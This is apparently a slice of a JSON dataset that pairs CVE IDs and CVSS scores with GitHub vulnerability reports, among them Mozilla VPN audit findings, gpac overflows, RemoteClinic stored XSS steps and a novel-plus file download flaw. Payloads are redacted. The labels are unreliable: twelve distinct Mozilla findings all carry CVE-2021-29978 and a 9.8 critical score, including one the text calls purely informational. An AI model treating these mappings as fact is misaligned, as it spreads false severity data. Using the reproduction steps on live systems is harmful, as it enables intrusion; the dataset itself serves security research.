  65450. "description": "FVP NUMBERTAG WP5: Android app supports insecure NUMBERTAG signature. The discovery was made that the provided Android staging and production builds are signed with an insecure NUMBERTAG APK signature. Using the insecure NUMBERTAG signature makes the app prone to the known Janus vulnerability on devices running Android NUMBERTAG The problem lets attackers smuggle malicious code into the APK without breaking the signature. At the time of writing, the app supports a minimum SDK of NUMBERTAG APITAG NUMBERTAG which only uses the NUMBERTAG signature and is, hence, vulnerable to this attack. The existence of this flaw means that attackers could trick users into installing a malicious attacker controlled APK which matches the NUMBERTAG APK signature of the Mozilla VPN Android application. As a result, a transparent update would be possible without warnings appearing in Android, effectively taking over the existing application and all of its data. It is recommended to increase the minimum supported SDK level to at least NUMBERTAG APITAG NUMBERTAG to ensure that this known vulnerability cannot be exploited on devices running older Android versions. In addition, the production builds should only be shipped with NUMBERTAG and NUMBERTAG APK signatures.",
  65451. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65452. "severity": "CRITICAL",
  65453. "baseScore": 9.8,
  65454. "impactScore": 5.9,
  65455. "exploitabilityScore": 3.9
  65456. },
  65457. {
  65458. "CVE_ID": "CVE-2021-29978",
  65459. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/804",
  65460. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/804",
  65461. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65462. "Issue_Created_At": "2021-04-07T15:54:19Z",
  65463. "description": "FVP NUMBERTAG WP5: Secure flag missing on views for Android app. During the assessment of the Android app, the discovery was made that the FLAG_SECURE security flag is not deployed to protect views that display sensitive content. By applying the flag for Android views, the app\u2019s windows can no longer be manually \u201cscreenshotted\u201d. Additionally, the items would be excluded from automatic screenshots or screen recordings, which ultimately prevents screen data from leakage to alternative apps. Particularly for the implemented views displaying sensitive data, e.g. during the login process, adding this flag is important. An attacker would otherwise be able to steal sensitive data, such as login credentials or personal information, doing it after it has been displayed. Hence, this information could be stolen from the services via a malicious app.",
  65464. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65465. "severity": "CRITICAL",
  65466. "baseScore": 9.8,
  65467. "impactScore": 5.9,
  65468. "exploitabilityScore": 3.9
  65469. },
  65470. {
  65471. "CVE_ID": "CVE-2021-29978",
  65472. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/806",
  65473. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/806",
  65474. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65475. "Issue_Created_At": "2021-04-07T15:56:28Z",
  65476. "description": "FVP NUMBERTAG API: Information disclosure via device endpoint. It was found that the corresponding API used by the Mozilla VPN applications includes sensitive information into response messages in case an error is triggered. The backend speaks to the Mullvad partner API which handles account related data for each Mozilla VPN user. However, if the Mullvad API throws an error, the backend includes this message in the response and returns it to the client. This might lead to an exposure of sensitive data, such as the corresponding Mullvad account ID, as shown below. Adversaries would be able to leverage this sort of information to perform further attacks against the connected APIs. ERRORTAG It is recommended not to route error messages received from the Mullvad partner API back to the client. Instead, a static error message or an error identifier should be employed to be able to monitor the application.",
  65477. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65478. "severity": "CRITICAL",
  65479. "baseScore": 9.8,
  65480. "impactScore": 5.9,
  65481. "exploitabilityScore": 3.9
  65482. },
  65483. {
  65484. "CVE_ID": "CVE-2021-29978",
  65485. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/809",
  65486. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/809",
  65487. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65488. "Issue_Created_At": "2021-04-07T15:58:23Z",
  65489. "description": "FVP NUMBERTAG WP5: Android app exposes sensitive data to system logs. It was found that the Android app makes frequent use of logging features to be able to monitor events. However, this can be considered a bad practice, especially in production environments where tokens and codes of Mozilla VPN users might be accessible by third parties. In case the device is connected to the computer with debugging enabled via USB, an attacker may be able to get access to the logs via adb logcat. From there, extraction of user tokens may be achievable. Note that apps with system privileges are able to access logs directly on rooted devices.",
  65490. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65491. "severity": "CRITICAL",
  65492. "baseScore": 9.8,
  65493. "impactScore": 5.9,
  65494. "exploitabilityScore": 3.9
  65495. },
  65496. {
  65497. "CVE_ID": "CVE-2021-29978",
  65498. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/808",
  65499. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/808",
  65500. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65501. "Issue_Created_At": "2021-04-07T15:57:56Z",
  65502. "description": "FVP NUMBERTAG WP5: Unencrypted shared preferences. During the assessment of the Android app, the discovery was made that the application does not always consistently use the encrypted shared preference feature provided by the Android SDK. This may lead to an information disclosure in case a local attacker is able to get root access to the phone or the data is obtainable via backups (see FVP NUMBERTAG). Sensitive information stored within the shared_prefs data folder in plain text, such as user VPN IPs and private keys, could be revealed. It is advised to use the provided wrapper class called APITAG to encrypt sensitive data stored within the shared_prefs folder, so as to make the application more robust against the illustrated attacks. The wrapper class uses the Android Keystore for handling the master key and is used to encrypt/decrypt all other keysets. For more information, please refer to the official Android guide on storing data more securely. Additionally, it is also advised to store VPN configuration data via encrypted shared preferences, which is actually also written to the vpn.moz file in plain text.",
  65503. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65504. "severity": "CRITICAL",
  65505. "baseScore": 9.8,
  65506. "impactScore": 5.9,
  65507. "exploitabilityScore": 3.9
  65508. },
  65509. {
  65510. "CVE_ID": "CVE-2021-29978",
  65511. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/797",
  65512. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/797",
  65513. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65514. "Issue_Created_At": "2021-04-07T15:48:16Z",
  65515. "description": "FVP NUMBERTAG WP1: Balrog does not verify certificate chain on APITAG It was found that Balrog does not verify the whole certificate chain on APITAG This allows attackers to supply a self signed leaf certificate, effectively indicating a bypass of Balrog. This could be abused by state funded attackers who are in charge of a trusted valid certificate authority. They could perform a Man in the Middle attack and replace the binary code provided by the Mozilla VPN update with malicious malware.",
  65516. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65517. "severity": "CRITICAL",
  65518. "baseScore": 9.8,
  65519. "impactScore": 5.9,
  65520. "exploitabilityScore": 3.9
  65521. },
  65522. {
  65523. "CVE_ID": "CVE-2021-29978",
  65524. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/799",
  65525. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/799",
  65526. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65527. "Issue_Created_At": "2021-04-07T15:49:46Z",
  65528. "description": "FVP NUMBERTAG WP4: ATS policy unnecessarily weakened. The iOS Mozilla VPN app was checked for property settings which weaken the security of the application. It was discovered that APITAG is set. This means it disables the default App Transport Security restrictions and permits the app to utilize plain text HTTP requests. Affected File: APITAG Affected Code: APITAG As neither the source code nor the runtime assessment indicated that the iOS app actually requires plain text HTTP, it should be taken into consideration to remove this property. This would ensure that the default ATS restrictions are enforced.",
  65529. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65530. "severity": "CRITICAL",
  65531. "baseScore": 9.8,
  65532. "impactScore": 5.9,
  65533. "exploitabilityScore": 3.9
  65534. },
  65535. {
  65536. "CVE_ID": "CVE-2021-29978",
  65537. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/810",
  65538. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/810",
  65539. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65540. "Issue_Created_At": "2021-04-07T15:58:54Z",
  65541. "description": "FVP NUMBERTAG General: Cross site APITAG hijacking. The provided staging build contains the Mozilla VPN APITAG Controller, which exposes a APITAG endpoint on localhost. No additional authentication is required to interact with this port, thus allowing any website to connect and interact with the VPN client. At the beginning of the audit, Mozilla assured that this APITAG server is only part of the staging build. However, later it was revealed that Mozilla would like to reuse this connection for communication with a browser extension in the future. Thus, Cure NUMBERTAG decided to report this issue. The following code can be hosted on an arbitrary website. When Mozilla VPN is running, the website will connect to the APITAG port and request a screenshot. This screenshot can then be leaked to the attacker.",
  65542. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65543. "severity": "CRITICAL",
  65544. "baseScore": 9.8,
  65545. "impactScore": 5.9,
  65546. "exploitabilityScore": 3.9
  65547. },
  65548. {
  65549. "CVE_ID": "CVE-2021-29978",
  65550. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/798",
  65551. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/798",
  65552. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65553. "Issue_Created_At": "2021-04-07T15:48:56Z",
  65554. "description": "FVP NUMBERTAG General: Balrog incorrectly verifies certificate chain. It was found that Balrog does not properly verify the certificate chain, permitting rogue root certificates and their fellowship to pass. The attacker controlled leaf certificate holds a public key that will be used to verify the update used in Windows and APITAG This signifies the risk of state funded attackers who are in charge of a trusted certificate authority being able to perform Man in the Middle attacks on the TLS connection initiated by Mozilla VPN to receive updates. Attackers can now replace the binary code of the update with malicious malware bypassing the Balrog mechanism that intends to detect those attacks.",
  65555. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65556. "severity": "CRITICAL",
  65557. "baseScore": 9.8,
  65558. "impactScore": 5.9,
  65559. "exploitabilityScore": 3.9
  65560. },
  65561. {
  65562. "CVE_ID": "CVE-2021-29978",
  65563. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/801",
  65564. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/801",
  65565. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65566. "Issue_Created_At": "2021-04-07T15:52:13Z",
  65567. "description": "FVP NUMBERTAG WP3: Race condition in Ping Sender could expose gateway IP. It was found that Mozilla VPN was prone to a race condition vulnerability in the Ping Sender that frequently delivers ICMP packets to the internal IP address of the APITAG gateway. Shortly after turning the VPN off, those ICMP packets are at risk of being sent outside of the APITAG tunnel and might reveal which gateway IP was used. Since this event is very rare and unreliable, whilst information leakage is additionally scarce, this issue is of purely informational nature.",
  65568. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65569. "severity": "CRITICAL",
  65570. "baseScore": 9.8,
  65571. "impactScore": 5.9,
  65572. "exploitabilityScore": 3.9
  65573. },
  65574. {
  65575. "CVE_ID": "CVE-2021-29978",
  65576. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/812",
  65577. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/812",
  65578. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65579. "Issue_Created_At": "2021-04-07T16:02:36Z",
  65580. "description": "FVP NUMBERTAG APITAG Auth code could be leaked by injecting port. When a user wants to log into Mozilla VPN, the VPN client will make a request to https:// PATHTAG to obtain an authorization URL. The endpoint takes a port parameter that will be reflected in a APITAG element after the user signs into the web page. It was found that the port parameter can be of arbitrary value. Further, it is possible to inject the @ sign, so that the request will go to an arbitrary host instead of localhost. Theoretically, an attacker can give a crafted URL to a victim and once the victim uses it to log in, their authorization code will be leaked to the attacker\u2019s website. However, the CSP in place contains a strict img src directive which prevents exploitation.",
  65581. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65582. "severity": "CRITICAL",
  65583. "baseScore": 9.8,
  65584. "impactScore": 5.9,
  65585. "exploitabilityScore": 3.9
  65586. },
  65587. {
  65588. "CVE_ID": "CVE-2021-29978",
  65589. "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/800",
  65590. "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/800",
  65591. "Repo_new": "mozilla-mobile/mozilla-vpn-client",
  65592. "Issue_Created_At": "2021-04-07T15:50:57Z",
  65593. "description": "FVP NUMBERTAG WP NUMBERTAG Authenticationlistener allows disturbance of login. It was found that Mozilla VPN in desktop environments sets up an HTTP server listening on a port acting as the APITAG callback expecting an Authorization Code to complete the Authentication of Mozilla VPN. This means there is a risk of attackers spamming requests to the local server via APITAG potentially disturbing the login process of the apps. This is possible as the local HTTP server is not protected by an additional secret and cannot distinguish between legitimate requests from malicious ones.",
  65594. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65595. "severity": "CRITICAL",
  65596. "baseScore": 9.8,
  65597. "impactScore": 5.9,
  65598. "exploitabilityScore": 3.9
  65599. },
  65600. {
  65601. "CVE_ID": "CVE-2021-29996",
  65602. "Issue_Url_old": "https://github.com/marktext/marktext/issues/2548",
  65603. "Issue_Url_new": "https://github.com/marktext/marktext/issues/2548",
  65604. "Repo_new": "marktext/marktext",
  65605. "Issue_Created_At": "2021-04-04T20:40:31Z",
  65606. "description": "XSS vulnerability could result in RCE CVETAG . Description Cross Site Scripting (XSS) vulnerability that could result in Remote Code Execution (RCE). CVETAG was assigned for this issue. Steps to reproduce NUMBERTAG Create a .md file that contains: APITAG APITAG ` Expected behavior: Language input for the fenced code block should be sanitized before rendered. Actual behavior: HTML stored as language input is not sanitized. Arbitrary javascript code is executed upon rendering. Processes outside of Mark Text could be executed due to APITAG being enabled. Proof of Concept FILETAG Versions Mark Text version NUMBERTAG Operating system: Windows, Linux, APITAG",
  65607. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  65608. "severity": "CRITICAL",
  65609. "baseScore": 9.6,
  65610. "impactScore": 6.0,
  65611. "exploitabilityScore": 2.8
  65612. },
  65613. {
  65614. "CVE_ID": "CVE-2021-30014",
  65615. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1721",
  65616. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1721",
  65617. "Repo_new": "gpac/gpac",
  65618. "Issue_Created_At": "2021-03-29T06:03:15Z",
  65619. "description": "An integer overflow in function hevc_parse_slice_segment. There is an integer overflow in APITAG function hevc_parse_slice_segment. Below code: CODETAG However, the function may return a negative number to pps_id, which is smaller than NUMBERTAG This results in a crash in the subsequent execution. In command Line: FILETAG In gdb: FILETAG The crafted file is in the attached zip: FILETAG",
  65620. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65621. "severity": "MEDIUM",
  65622. "baseScore": 5.5,
  65623. "impactScore": 3.6,
  65624. "exploitabilityScore": 1.8
  65625. },
  65626. {
  65627. "CVE_ID": "CVE-2021-30015",
  65628. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1719",
  65629. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1719",
  65630. "Repo_new": "gpac/gpac",
  65631. "Issue_Created_At": "2021-03-29T05:24:39Z",
  65632. "description": "A Null Pointer Dereference In APITAG There is a Null Pointer Dereference in function APITAG \uff0c The pid comes from function APITAG , the APITAG may be NULL. This results in a crash in APITAG . In command line: FILETAG In gdb: FILETAG The crafted file is in the attached zip:",
  65633. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65634. "severity": "MEDIUM",
  65635. "baseScore": 5.5,
  65636. "impactScore": 3.6,
  65637. "exploitabilityScore": 1.8
  65638. },
  65639. {
  65640. "CVE_ID": "CVE-2021-30019",
  65641. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1723",
  65642. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1723",
  65643. "Repo_new": "gpac/gpac",
  65644. "Issue_Created_At": "2021-03-29T07:23:30Z",
  65645. "description": "An integer (heap) overflow in function adts_dmx_process. In APITAG , function APITAG . There is a code snippet like the one below: APITAG However, with a crafted file, ctx APITAG may be smaller than ctx APITAG So, the size may be a negative number, which results in a heap overflow in memcpy. In Command line: gpac info bug6 FILETAG In gdb: FILETAG The crafted file is in the attached zip: FILETAG",
  65646. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65647. "severity": "MEDIUM",
  65648. "baseScore": 5.5,
  65649. "impactScore": 3.6,
  65650. "exploitabilityScore": 1.8
  65651. },
  65652. {
  65653. "CVE_ID": "CVE-2021-3002",
  65654. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/202",
  65655. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/202",
  65656. "Repo_new": "seopanel/seo-panel",
  65657. "Issue_Created_At": "2021-01-01T11:31:37Z",
  65658. "description": "FILETAG I'm going to request CVE",
  65659. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  65660. "severity": "MEDIUM",
  65661. "baseScore": 6.1,
  65662. "impactScore": 2.7,
  65663. "exploitabilityScore": 2.8
  65664. },
  65665. {
  65666. "CVE_ID": "CVE-2021-30020",
  65667. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1722",
  65668. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1722",
  65669. "Repo_new": "gpac/gpac",
  65670. "Issue_Created_At": "2021-03-29T06:29:39Z",
  65671. "description": "A stack overflow in function gf_hevc_read_pps_bs_internal. In APITAG , function APITAG . There is a loop as below: ERRORTAG However, with crafted file, pps >num_tile_columns may be larger than sizeof(pps >column_width), which results a stack overflow in the loop. In Command line: FILETAG In gdb: FILETAG The crafted file is in the attached zip: FILETAG",
  65672. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65673. "severity": "MEDIUM",
  65674. "baseScore": 5.5,
  65675. "impactScore": 3.6,
  65676. "exploitabilityScore": 1.8
  65677. },
  65678. {
  65679. "CVE_ID": "CVE-2021-30022",
  65680. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1720",
  65681. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1720",
  65682. "Repo_new": "gpac/gpac",
  65683. "Issue_Created_At": "2021-03-29T05:34:17Z",
  65684. "description": "An Integer Overflow in function gf_avc_read_pps_bs_internal. There is an integer overflow in APITAG , function APITAG . Below code: APITAG pps_id may be a negative number, so the check will not return. However, avc >pps only has NUMBERTAG unit, so it overflows, which results in a crash. Moreover, because of the APITAG , the vuln may lead to an arbitrary address write. In command Line: FILETAG In gdb: FILETAG The crafted file is in the attached zip: FILETAG",
  65685. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65686. "severity": "MEDIUM",
  65687. "baseScore": 5.5,
  65688. "impactScore": 3.6,
  65689. "exploitabilityScore": 1.8
  65690. },
  65691. {
  65692. "CVE_ID": "CVE-2021-30027",
  65693. "Issue_Url_old": "https://github.com/mity/md4c/issues/155",
  65694. "Issue_Url_new": "https://github.com/mity/md4c/issues/155",
  65695. "Repo_new": "mity/md4c",
  65696. "Issue_Created_At": "2021-03-27T18:39:10Z",
  65697. "description": "Use of uninitialized value in the APITAG function. Hi, While fuzzing md4c NUMBERTAG with AFL++ and MSAN, I found out that the APITAG function may use uninitialized memory. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG with memory origin tracking option APITAG ERRORTAG",
  65698. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65699. "severity": "MEDIUM",
  65700. "baseScore": 5.5,
  65701. "impactScore": 3.6,
  65702. "exploitabilityScore": 1.8
  65703. },
  65704. {
  65705. "CVE_ID": "CVE-2021-30030",
  65706. "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/1",
  65707. "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/1",
  65708. "Repo_new": "remoteclinic/remoteclinic",
  65709. "Issue_Created_At": "2021-03-28T13:53:58Z",
  65710. "description": "Cross Site Scripting APITAG XSS) vulnerability in /patients . Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page (patients). Vulnerable Endpoint: URLTAG Step To Reproduce NUMBERTAG Login to Application as a Doctor NUMBERTAG Now go to APITAG Patient\". FILETAG NUMBERTAG Register a Patient Name with below XSS Payload: FILETAG FILETAG NUMBERTAG After Register Patient, go to APITAG FILETAG NUMBERTAG SS Executed. FILETAG",
  65711. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  65712. "severity": "MEDIUM",
  65713. "baseScore": 5.4,
  65714. "impactScore": 2.7,
  65715. "exploitabilityScore": 2.3
  65716. },
  65717. {
  65718. "CVE_ID": "CVE-2021-30034",
  65719. "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/5",
  65720. "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/5",
  65721. "Repo_new": "remoteclinic/remoteclinic",
  65722. "Issue_Created_At": "2021-03-29T14:48:24Z",
  65723. "description": "Stored XSS vulnerability in /dashboard. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: URLTAG Step To Reproduce NUMBERTAG Login in Application as a doctor NUMBERTAG Register a patient. FILETAG FILETAG NUMBERTAG After Register a Patient, a page redirect you to \"register report page\". FILETAG NUMBERTAG Here is APITAG field where i inject XSS payload. FILETAG FILETAG NUMBERTAG After Register Report, Click on home. FILETAG NUMBERTAG SS Executed on Dashboard Endpoint. FILETAG",
  65724. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  65725. "severity": "MEDIUM",
  65726. "baseScore": 5.4,
  65727. "impactScore": 2.7,
  65728. "exploitabilityScore": 2.3
  65729. },
  65730. {
  65731. "CVE_ID": "CVE-2021-30039",
  65732. "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/8",
  65733. "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/8",
  65734. "Repo_new": "remoteclinic/remoteclinic",
  65735. "Issue_Created_At": "2021-03-31T11:45:59Z",
  65736. "description": "Stored XSS vulnerability in /patients/ FILETAG APITAG ID}. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: URLTAG (In my case NUMBERTAG is My Patient Report ID). Steps to Reproduce NUMBERTAG Login in Application as Doctor NUMBERTAG Register New Patient. FILETAG FILETAG NUMBERTAG After Register New Patient, a page redirect to Register Report Page, when you scroll down page two fields there APITAG and APITAG Pressure\" where i inject XSS Payload: FILETAG FILETAG NUMBERTAG Now go to home page. FILETAG NUMBERTAG Click on Report which shows on dashboard APITAG FILETAG NUMBERTAG SS Executed on reports.php endpoint. FILETAG",
  65737. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  65738. "severity": "MEDIUM",
  65739. "baseScore": 5.4,
  65740. "impactScore": 2.7,
  65741. "exploitabilityScore": 2.3
  65742. },
  65743. {
  65744. "CVE_ID": "CVE-2021-30042",
  65745. "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/11",
  65746. "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/11",
  65747. "Repo_new": "remoteclinic/remoteclinic",
  65748. "Issue_Created_At": "2021-03-31T17:31:59Z",
  65749. "description": "Stored XSS vulnerability in APITAG ID}. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: URLTAG (in my case NUMBERTAG is Clinic ID). Step To Reproduce NUMBERTAG Login in Application as Doctor NUMBERTAG When you scroll down the main dashboard page, there is clinics options, Click APITAG Clinic\". FILETAG NUMBERTAG Here is four fields vulnerable for XSS APITAG ID} endpoint, APITAG Name\", APITAG Address\", APITAG City\" and APITAG Contact\", Inject XSS Payload in APITAG Name\", APITAG Address\", APITAG City\" and APITAG Contact\". FILETAG FILETAG NUMBERTAG Click on APITAG NUMBERTAG Now Click on APITAG Directory\". FILETAG NUMBERTAG After click on APITAG Directory\", you direct to /clinics/ endpoint where clinics directory show. Click on Clinic where XSS name show. FILETAG NUMBERTAG SS Executed on APITAG ID} endpoint. FILETAG",
  65750. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  65751. "severity": "MEDIUM",
  65752. "baseScore": 5.4,
  65753. "impactScore": 2.7,
  65754. "exploitabilityScore": 2.3
  65755. },
  65756. {
  65757. "CVE_ID": "CVE-2021-30044",
  65758. "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/13",
  65759. "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/13",
  65760. "Repo_new": "remoteclinic/remoteclinic",
  65761. "Issue_Created_At": "2021-04-01T17:27:54Z",
  65762. "description": "Stored XSS vulnerability Site Wide. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: All Endpoints are vulnerable to XSS. Step to Reproduce NUMBERTAG Login in Application as Doctor NUMBERTAG Create New Staff Member. FILETAG NUMBERTAG Put XSS Payload on APITAG Name\" and APITAG Name\" of Staff. Both Fields are vulnerable XSS APITAG Wide). FILETAG FILETAG NUMBERTAG Now Click on Register. FILETAG NUMBERTAG Profile Created. FILETAG NUMBERTAG Now APITAG FILETAG NUMBERTAG Now Login to that Staff account which i created in the name of XSS Payload. FILETAG NUMBERTAG SS Executed on /dashboard/ endpoint because staff member name including APITAG Name\" and APITAG Name\" Both are reflected on all the pages/endpoints. FILETAG > Go to /patients/ endpoint. FILETAG > Go to FILETAG endpoint. FILETAG > Go to FILETAG endpoint. FILETAG I tested all endpoints of APITAG NUMBERTAG all are vulnerable to XSS because of APITAG Name\" and APITAG Name\" of Staff reflected all the pages and some of the endpoints i mentioned in the form of screenshots above.",
  65763. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  65764. "severity": "MEDIUM",
  65765. "baseScore": 5.4,
  65766. "impactScore": 2.7,
  65767. "exploitabilityScore": 2.3
  65768. },
  65769. {
  65770. "CVE_ID": "CVE-2021-30045",
  65771. "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/5975",
  65772. "Issue_Url_new": "https://github.com/serenityos/serenity/issues/5975",
  65773. "Repo_new": "serenityos/serenity",
  65774. "Issue_Created_At": "2021-03-27T13:56:01Z",
  65775. "description": "APITAG Buffer overflow in APITAG Found with APITAG File: FILETAG Trace: ERRORTAG",
  65776. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  65777. "severity": "CRITICAL",
  65778. "baseScore": 9.1,
  65779. "impactScore": 5.2,
  65780. "exploitabilityScore": 3.9
  65781. },
  65782. {
  65783. "CVE_ID": "CVE-2021-30046",
  65784. "Issue_Url_old": "https://github.com/ukoethe/vigra/issues/494",
  65785. "Issue_Url_new": "https://github.com/ukoethe/vigra/issues/494",
  65786. "Repo_new": "ukoethe/vigra",
  65787. "Issue_Created_At": "2021-03-31T09:32:15Z",
  65788. "description": "Segmentation Fault error in APITAG of APITAG Hello, Using hugin APITAG software verdandi adopting vigra, I encountered on the segmentation fault error. ( URLTAG The root cause is assumed to be from Illegal reference by ERRORTAG of debian package > libvigraimpex dev/focal,now NUMBERTAG dfsg NUMBERTAG ubuntu1 The APITAG is assumed to be out of bound without any appropriate check of the valid address dereferenced by scanline. See PATHTAG lines; CODETAG The running command and backtrace is ERRORTAG FILETAG I attached the poc file on this post. Please kindly check the error. Best, Choongin Lee",
  65789. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65790. "severity": "MEDIUM",
  65791. "baseScore": 6.5,
  65792. "impactScore": 3.6,
  65793. "exploitabilityScore": 2.8
  65794. },
  65795. {
  65796. "CVE_ID": "CVE-2021-30048",
  65797. "Issue_Url_old": "https://github.com/201206030/novel-plus/issues/39",
  65798. "Issue_Url_new": "https://github.com/201206030/novel-plus/issues/39",
  65799. "Repo_new": "201206030/novel-plus",
  65800. "Issue_Created_At": "2021-04-06T07:52:39Z",
  65801. "description": "novel plus Arbitrary File Download. Vulnerable code: PATHTAG APITAG = \"/download\") public void APITAG APITAG APITAG APITAG resp) throws Exception { String APITAG = APITAG + APITAG APITAG in = new APITAG APITAG = APITAG \"UTF NUMBERTAG APITAG Disposition\", \"attachment;filename=\" + APITAG APITAG APITAG out = APITAG APITAG b = new byte NUMBERTAG int len NUMBERTAG while ((len = in.read(b NUMBERTAG APITAG NUMBERTAG len); } APITAG APITAG APITAG } Guide: APITAG in to background management NUMBERTAG URLTAG",
  65802. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
